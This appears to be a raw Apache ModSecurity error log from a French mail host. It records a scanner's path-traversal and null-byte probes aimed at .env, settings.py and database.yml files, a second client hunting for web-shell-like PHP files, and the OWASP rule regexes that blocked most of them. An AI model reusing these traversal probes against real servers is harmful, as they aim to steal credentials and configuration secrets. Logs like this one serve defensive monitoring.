[Tue May 12 05:22:23.976364 2026] [security2:error] [pid 1825179:tid 1825211] [client 45.148.10.238:22112] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc79r1yOh9TvizezidnQAAAE0"]
[Tue May 12 05:22:23.976393 2026] [security2:error] [pid 1825179:tid 1825211] [client 45.148.10.238:22112] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc79r1yOh9TvizezidnQAAAE0"]
[Tue May 12 05:22:23.976631 2026] [security2:error] [pid 1825179:tid 1825211] [client 45.148.10.238:22112] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc79r1yOh9TvizezidnQAAAE0"]
[Tue May 12 05:22:23.976688 2026] [security2:error] [pid 1825179:tid 1825211] [client 45.148.10.238:22112] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc79r1yOh9TvizezidnQAAAE0"]
[Tue May 12 05:22:23.976721 2026] [security2:error] [pid 1825179:tid 1825211] [client 45.148.10.238:22112] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc79r1yOh9TvizezidnQAAAE0"]
[Tue May 12 05:22:23.977145 2026] [security2:error] [pid 1825179:tid 1825211] [client 45.148.10.238:22112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc79r1yOh9TvizezidnQAAAE0"]
[Tue May 12 05:22:23.981218 2026] [security2:error] [pid 1825287:tid 1825327] [client 45.148.10.238:22102] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKc7wgpmE1yW0glLdgsTwAAANU"]
[Tue May 12 05:22:23.981398 2026] [security2:error] [pid 1825287:tid 1825327] [client 45.148.10.238:22102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKc7wgpmE1yW0glLdgsTwAAANU"]
[Tue May 12 05:22:23.993117 2026] [security2:error] [pid 1842385:tid 1842405] [client 45.148.10.238:22130] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKc7xs7kySIUZ3ORnIknwAAAQ8"]
[Tue May 12 05:22:23.993314 2026] [security2:error] [pid 1842385:tid 1842405] [client 45.148.10.238:22130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKc7xs7kySIUZ3ORnIknwAAAQ8"]
[Tue May 12 05:22:24.595934 2026] [security2:error] [pid 1825179:tid 1825215] [client 45.148.10.238:29772] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc4Nr1yOh9TvizezidiAAAAFE"]
[Tue May 12 05:22:24.749652 2026] [security2:error] [pid 1808852:tid 1808857] [client 45.148.10.238:29620] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc3RfeipD4uoG21FouyAAAAAI"]
[Tue May 12 05:22:26.033417 2026] [:error] [pid 1820198:tid 1820222] [client 20.226.81.141:42985] File does not exist: /home/cpcentre/public_html/ws80.php
[Tue May 12 05:22:27.282530 2026] [:error] [pid 1820198:tid 1820222] [client 20.226.81.141:42985] File does not exist: /home/cpcentre/public_html/bgymj.php
[Tue May 12 05:22:28.037303 2026] [security2:error] [pid 1844863:tid 1844888] [client 45.148.10.238:60910] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/var/www/.env"] [unique_id "agKc9PaAnTZtx1_H_wy1TgAAAVM"]
[Tue May 12 05:22:28.037493 2026] [security2:error] [pid 1844863:tid 1844888] [client 45.148.10.238:60910] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/var/www/.env"] [unique_id "agKc9PaAnTZtx1_H_wy1TgAAAVM"]
[Tue May 12 05:22:28.086222 2026] [:error] [pid 1820198:tid 1820222] [client 20.226.81.141:42985] File does not exist: /home/cpcentre/public_html/wper.php
[Tue May 12 05:22:29.400876 2026] [:error] [pid 1820198:tid 1820222] [client 20.226.81.141:42985] File does not exist: /home/cpcentre/public_html/wtiiy.php
[Tue May 12 05:22:29.438012 2026] [security2:error] [pid 1820198:tid 1820221] [client 45.148.10.238:60896] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/api/.env"] [unique_id "agKc9c1tk6y7yBJLpJo4FQAAAJU"]
[Tue May 12 05:22:29.438283 2026] [security2:error] [pid 1820198:tid 1820221] [client 45.148.10.238:60896] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/.env"] [unique_id "agKc9c1tk6y7yBJLpJo4FQAAAJU"]
[Tue May 12 05:22:29.440123 2026] [security2:error] [pid 1825179:tid 1825206] [client 45.148.10.238:60902] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc9dr1yOh9TvizezidoAAAAEg"]
[Tue May 12 05:22:29.440178 2026] [security2:error] [pid 1825179:tid 1825206] [client 45.148.10.238:60902] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc9dr1yOh9TvizezidoAAAAEg"]
[Tue May 12 05:22:29.440206 2026] [security2:error] [pid 1825179:tid 1825206] [client 45.148.10.238:60902] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc9dr1yOh9TvizezidoAAAAEg"]
[Tue May 12 05:22:29.440420 2026] [security2:error] [pid 1825179:tid 1825206] [client 45.148.10.238:60902] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc9dr1yOh9TvizezidoAAAAEg"]
[Tue May 12 05:22:29.441712 2026] [security2:error] [pid 1808852:tid 1808870] [client 45.148.10.238:60906] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKc9RfeipD4uoG21Fou8wAAAA8"]
[Tue May 12 05:22:29.441942 2026] [security2:error] [pid 1808852:tid 1808870] [client 45.148.10.238:60906] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKc9RfeipD4uoG21Fou8wAAAA8"]
[Tue May 12 05:22:29.459475 2026] [security2:error] [pid 1825179:tid 1825206] [client 45.148.10.238:60902] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc9dr1yOh9TvizezidoAAAAEg"]
[Tue May 12 05:22:29.471194 2026] [security2:error] [pid 1825179:tid 1825206] [client 45.148.10.238:60902] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc9dr1yOh9TvizezidoAAAAEg"]
[Tue May 12 05:22:30.580213 2026] [:error] [pid 1820198:tid 1820222] [client 20.226.81.141:42985] File does not exist: /home/cpcentre/public_html/xwx1.php
[Tue May 12 05:22:31.516408 2026] [security2:error] [pid 1842385:tid 1842412] [client 45.148.10.238:60926] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/var/www/html/.env"] [unique_id "agKc9xs7kySIUZ3ORnIkqwAAARU"]
[Tue May 12 05:22:31.516609 2026] [security2:error] [pid 1842385:tid 1842412] [client 45.148.10.238:60926] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/var/www/html/.env"] [unique_id "agKc9xs7kySIUZ3ORnIkqwAAARU"]
[Tue May 12 05:22:31.615911 2026] [:error] [pid 1820198:tid 1820222] [client 20.226.81.141:42985] File does not exist: /home/cpcentre/public_html/a4.php
[Tue May 12 05:22:32.226106 2026] [:error] [pid 1820198:tid 1820222] [client 20.226.81.141:42985] File does not exist: /home/cpcentre/public_html/wp-blog.php
[Tue May 12 05:22:33.065987 2026] [security2:error] [pid 1825287:tid 1825310] [client 45.148.10.238:60950] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKc-QgpmE1yW0glLdgsUwAAAMU"]
[Tue May 12 05:22:33.066078 2026] [security2:error] [pid 1825287:tid 1825310] [client 45.148.10.238:60950] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKc-QgpmE1yW0glLdgsUwAAAMU"]
[Tue May 12 05:22:33.066249 2026] [security2:error] [pid 1825287:tid 1825310] [client 45.148.10.238:60950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKc-QgpmE1yW0glLdgsUwAAAMU"]
[Tue May 12 05:22:33.066249 2026] [security2:error] [pid 1842385:tid 1842393] [client 45.148.10.238:60934] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/api/.env"] [unique_id "agKc-Rs7kySIUZ3ORnIkrAAAAQM"]
[Tue May 12 05:22:33.066427 2026] [security2:error] [pid 1842385:tid 1842393] [client 45.148.10.238:60934] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/.env"] [unique_id "agKc-Rs7kySIUZ3ORnIkrAAAAQM"]
[Tue May 12 05:22:33.069008 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.238:60952] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc-faAnTZtx1_H_wy1VQAAAUU"]
[Tue May 12 05:22:33.069068 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.238:60952] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc-faAnTZtx1_H_wy1VQAAAUU"]
[Tue May 12 05:22:33.069095 2026] [security2:error] [pid 1844863:tid 1844874] [client 45.148.10.238:60952] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/health"] [unique_id "agKc-faAnTZtx1_H_wy1VQAAAUU"]
